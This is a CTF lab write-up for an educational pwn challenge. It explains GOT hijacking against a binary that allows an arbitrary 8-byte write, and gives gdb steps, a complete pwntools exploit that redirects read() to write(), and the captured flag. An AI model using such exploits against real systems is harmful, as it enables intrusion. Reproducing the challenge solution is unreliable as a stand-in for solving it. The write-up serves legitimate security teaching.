Simple PWN - 0x06(GOT hijacking/Lab - `got2win`)

tags: CTF PWN eductf

challenge: nc edu-ctf.zoolab.org 10004

GOT Background

Lecture Vid. - Pwn week1 NTUSTISC - Pwn Basic 2 [2019.03.19]

Original Code

:::spoiler Original Code

#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <fcntl.h>

char flag[0x30];

int main()
{
    setvbuf(stdin, 0, _IONBF, 0);
    setvbuf(stdout, 0, _IONBF, 0);

    int fd = open("/home/chal/flag", O_RDONLY);
    read(fd, flag, 0x30);
    close(fd);
    write(1, "Good luck !\n", 13);

    unsigned long addr = 0;
    printf("Overwrite addr: ");
    scanf("%lu", &addr);
    printf("Overwrite 8 bytes value: ");
    read(0, (void *) addr, 0x8);

    printf("Give me fake flag: ");
    int nr = read(1, flag, 0x30);
    if (nr <= 0)
        exit(1);
    flag[nr - 1] = '\0';
    printf("This is your flag: ctf{%s}... Just kidding :)\n", flag);

    return 0;
}

:::

  • The program reads the flag into the global buffer first, at lines 13~16
  • At lines 19~22, it lets the user enter an address and then writes 8 bytes of user input to that address
  • At line 25, it may look odd that the program passes fd 1 (stdout) as the file descriptor for read()
  • In addition, there is no buffer overflow, so the technique from the earlier labs cannot be used to get the flag
  • Thus, our approach is to overwrite the `read GOT` entry with the `write plt` address, so that the call at line 25 actually executes write: int nr = write(1, flag, 0x30);

Exploit

  • First, we need to find the addresses of the read GOT entry and the write PLT stub
      gdb chal
      b main
      ni    # step until the call to write
      si    # step into the PLT stub to see the address it jumps through
    


  • Then we look up the address of the read GOT entry the same way
  • My exploit is:
      from pwn import *
    
      context.arch = 'amd64'
    
      r = remote('edu-ctf.zoolab.org', 10004)
      context.terminal = ['tmux', 'splitw', '-h']
    
      read_got = 0x404038   # GOT entry the binary jumps through when it calls read()
      write_plt = 0x4010c0  # PLT stub of write(); read() calls land here after the overwrite
    
      # The program takes the target address as a decimal number, then 8 raw bytes
      r.sendlineafter('Overwrite addr: ', str(read_got))
      r.sendafter('Overwrite 8 bytes value: ', p64(write_plt))
    
      # read(1, flag, 0x30) now runs as write(1, flag, 0x30) and prints the flag
      r.interactive()
    
    

    Then, the read call behaves as write and prints the flag `FLAG{apple_1f3870be274f6c49b3e31a0c6728957f}`

Reference

PWN week1